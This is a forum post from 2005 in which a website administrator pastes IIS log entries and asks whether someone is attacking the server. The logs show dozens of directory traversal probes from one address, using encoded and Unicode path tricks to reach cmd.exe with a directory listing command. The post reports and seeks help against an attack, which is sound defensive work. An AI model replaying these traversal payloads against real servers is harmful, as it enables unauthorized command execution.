IIS Log - Is somebody trying to Hack my website

**vishwas_joshi** · December 5th, 2005, 07:13 AM

Hi,

I am Sys Admin for a web site. I was going thru the IIS LOgs and found the following entries in the Logs files

2005-11-28 01:27:45 80.117.251.32 - 10.100.1.125 80 HEAD /index.html - 200 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /MSADC/root.exe /c+dir+c:\ 403 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:27:51 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:27:56 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:03 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:04 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:12 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:26 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:27 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:29 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:13 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:29:38 80.117.251.32 - 10.100.1.125 80 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:55 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:57 80.117.251.32 - 10.100.1.125 80 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:19 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:44 80.117.251.32 - 10.100.1.125 80 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:46 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:35 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:45 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:56 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:15 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:18 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:33:43 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:33:44 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:34:09 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:11 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:42 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:47 80.117.251.32 - 10.100.1.125 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:34:48 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:35:10 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:12 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:16 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:41 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:43 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:12 203.201.214.129 - 10.100.1.125 443 GET /index.html - 200 IPCHECK+4+www.paessler.com
2005-11-28 01:36:28 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:30 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:31 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:35 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:36 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:47 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:48 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:49 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:59 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:37:24 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:37:26 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:38:30 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:38:52 80.117.251.32 - 10.100.1.125 80
HEAD /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -

I think somebody is trying to hack into the system. Need help.

Regards,

Vishwas

Thread: IIS Log - Is somebody trying to Hack my website

Thread Tools

Display

Threaded View

IIS Log - Is somebody trying to Hack my website

Posting Permissions